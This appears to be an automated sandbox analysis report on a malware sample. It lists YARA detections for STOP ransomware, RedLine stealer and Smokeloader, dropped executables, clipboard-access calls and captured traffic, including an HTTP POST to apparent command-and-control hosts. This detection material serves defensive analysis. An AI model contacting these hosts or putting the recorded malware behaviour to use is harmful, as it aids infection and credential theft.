          Source: 98D7.exe, 00000010.00000002.605295836.000000000288C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: {"status":3,"accounts":"0"}JaU9pSlNSVWszYlhjaWZleUp6YVdRaU9qSTRPREF4T1N3aWRHbHRaU0k2TVRZM05UUT09ctingClientSingleton:{r:["Jg4hod5","3zhsDmU","Yv2Rq7N"],rds:{m:["ContextualConfig","BladeRunnerClient","DGWRequestStreamClient","MqttLongPollingRunner","BanzaiScuba_DEPRECATED"],r:["c6kpRKc","9Zir1u8","sqCOqNp","HN4gUih","foz7nw7","msMcd10","TjYa5zM","5p9Jgd9","Ajrp3n3","CUpDMe1"]},be:1},RequestStreamCommonRequestStreamCommonTypes:{r:["Jg4hod5"],be:1}}}},allResources:["c6kpRKc","sqCOqNp","GpQFBwL","TjYa5zM","foz7nw7","CUpDMe1","msMcd10","BnbajS7","HN4gUih","Da6rL6k"]});}));</script></body></html>ActiveSecondsConfig",[],{sampling_rate:0},423]],require:[["NavigationMetrics","setPage",[],[{page:"/login.php",page_type:"normal",page_uri:"https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing",serverLID:"7197487281236720703"}]],["FalcoLoggerTransports","attach",[],[]],["ClickRefLogger"],["DetectBrokenProxyCache","run",[],[0,"c_user"]],["NavigationClickPointHandler"],["WebDevicePerfInfoLogging","doLog",[],[]],["WebStorageMonster","schedule",[],[]],["Artillery","disable",[],[]],["ScriptPathLogger","startLogging",[],[]],["TimeSpentBitArrayLogger","init",[],[]],["DeferredCookie","addToQueue",[],["_js_datr","jJziY-D4SfNE_AIOga4wSI2k",63072000000,"/",true,false,true]],["DeferredCookie","addToQueue",[],["_js_sb","jJziY-AS0VgVTvocQFmmqm_m",63072000000,"/",false,false,true]]]},hsrp:{hsdp:{clpData:{"1871697":{r:1,s:1},"1829319":{PPTP){3DFD28C0-5D9B-43CA-809F-C01D8A78D17E}}Ada11 equals www.facebook.com (Facebook)
          Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qmxjpgcre.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: potunulit.org
          Source: unknownHTTPS traffic detected: 158.69.96.67:443 -> 192.168.2.3:49700 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49701 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 157.240.253.35:443 -> 192.168.2.3:49709 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.3:49714 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.3:49716 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49717 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49721 version: TLS 1.2

          Key, Mouse, Clipboard, Microphone and Screen Capturing

          barindex
          Source: Yara matchFile source: 00000000.00000002.313394418.0000000000851000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.313299344.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.443874552.00000000007E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.444700260.00000000021E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_00402830 Concurrency::cancel_current_task,Concurrency::cancel_current_task,Concurrency::cancel_current_task,OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,SetClipboardData,CloseClipboard,CloseClipboard,GlobalFree,OpenClipboard,GetClipboardData,CloseClipboard,GlobalLock,GlobalUnlock,CloseClipboard,CloseClipboard,
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_00402830 Concurrency::cancel_current_task,Concurrency::cancel_current_task,Concurrency::cancel_current_task,OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,SetClipboardData,CloseClipboard,CloseClipboard,GlobalFree,OpenClipboard,GetClipboardData,CloseClipboard,GlobalLock,GlobalUnlock,CloseClipboard,CloseClipboard,
          Source: file.exe, 00000000.00000002.313412011.0000000000918000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          Spam, unwanted Advertisements and Ransom Demands

          barindex
          Source: Yara matchFile source: 15.2.3046.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 33.2.3046.exe.23515a0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 42.2.3046.exe.23315a0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.3046.exe.23515a0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.3046.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 42.2.3046.exe.23315a0.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 33.2.3046.exe.23515a0.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.3046.exe.23515a0.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 39.2.3046.exe.23815a0.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 39.2.3046.exe.23815a0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000002.396916881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000002.518796436.0000000002330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000021.00000002.516427401.0000000002350000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000027.00000002.518320509.0000000002380000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: 3046.exe PID: 3680, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: 3046.exe PID: 5672, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: 3046.exe PID: 3112, type: MEMORYSTR

          System Summary

          barindex
          Source: 15.2.3046.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 15.2.3046.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 33.2.3046.exe.23515a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 33.2.3046.exe.23515a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 42.2.3046.exe.23315a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 42.2.3046.exe.23315a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 13.2.3046.exe.23515a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 13.2.3046.exe.23515a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 15.2.3046.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 15.2.3046.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 42.2.3046.exe.23315a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 42.2.3046.exe.23315a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 33.2.3046.exe.23515a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 33.2.3046.exe.23515a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 13.2.3046.exe.23515a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 13.2.3046.exe.23515a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 39.2.3046.exe.23815a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 39.2.3046.exe.23815a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 39.2.3046.exe.23815a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 39.2.3046.exe.23815a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 14.0.A33B.exe.7b0000.0.unpack, type: UNPACKEDPEMatched rule: Detects downloader / injector Author: ditekSHen
          Source: 00000011.00000002.443553763.0000000000640000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
          Source: 00000011.00000002.444263115.0000000000816000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 00000000.00000002.313442333.0000000000926000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 0000000D.00000002.396738460.000000000222E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 00000021.00000002.516055302.00000000022BA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 0000002A.00000002.518333813.0000000002290000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 00000012.00000002.483535048.0000000000726000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 00000000.00000002.313241208.0000000000680000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
          Source: 0000000D.00000002.396916881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 00000000.00000002.313394418.0000000000851000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
          Source: 00000000.00000002.313299344.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
          Source: 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 00000011.00000002.443874552.00000000007E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
          Source: 0000000B.00000002.604551133.0000000000550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
          Source: 00000012.00000002.483475283.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
          Source: 0000000B.00000002.605642320.00000000007C6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 00000011.00000002.444700260.00000000021E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
          Source: 00000027.00000002.517661661.00000000022E4000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 0000002A.00000002.518796436.0000000002330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 00000021.00000002.516427401.0000000002350000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 00000027.00000002.518320509.0000000002380000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: 3046.exe PID: 3680, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: 3046.exe PID: 5672, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: 3046.exe PID: 3112, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: C:\Users\user\AppData\Local\Temp\A33B.exe, type: DROPPEDMatched rule: Detects downloader / injector Author: ditekSHen
          Source: llpb1133.exe.14.drStatic PE information: .vmp0 and .vmp1 section names
          Source: C:\Users\user\AppData\Local\Temp\ECFB.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 996 -s 520
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00415458
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041545C
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040B403
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00411D50
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00413E21
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00412294
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004127D8
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_004010E0
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_00406150
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_004041D0
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_004021D0
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_0042429D
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_00411470
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_0042C5FE
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_004266B9
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_00402830
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_0040C9A0
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_00419A6E
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_0041CAF0
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_00409B10
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_0042AB9A
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_0040CC40
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_00401D90
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_0040CE90
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_00421F48
          Source: sqlite3.dll.19.drStatic PE information: Number of sections : 18 > 10
          Source: XandETC.exe.14.drStatic PE information: Number of sections : 11 > 10
          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 15.2.3046.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
          Source: 15.2.3046.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 15.2.3046.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 33.2.3046.exe.23515a0.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
          Source: 33.2.3046.exe.23515a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 33.2.3046.exe.23515a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 42.2.3046.exe.23315a0.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
          Source: 42.2.3046.exe.23315a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 42.2.3046.exe.23315a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 13.2.3046.exe.23515a0.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
          Source: 13.2.3046.exe.23515a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 13.2.3046.exe.23515a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 15.2.3046.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
          Source: 15.2.3046.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 15.2.3046.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 42.2.3046.exe.23315a0.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
          Source: 42.2.3046.exe.23315a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 42.2.3046.exe.23315a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 33.2.3046.exe.23515a0.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
          Source: 33.2.3046.exe.23515a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 33.2.3046.exe.23515a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 13.2.3046.exe.23515a0.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
          Source: 13.2.3046.exe.23515a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 13.2.3046.exe.23515a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 39.2.3046.exe.23815a0.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
          Source: 39.2.3046.exe.23815a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 39.2.3046.exe.23815a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 39.2.3046.exe.23815a0.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
          Source: 39.2.3046.exe.23815a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 39.2.3046.exe.23815a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 14.0.A33B.exe.7b0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
          Source: 00000011.00000002.443553763.0000000000640000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
          Source: 00000011.00000002.444263115.0000000000816000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 00000000.00000002.313442333.0000000000926000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 0000000D.00000002.396738460.000000000222E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
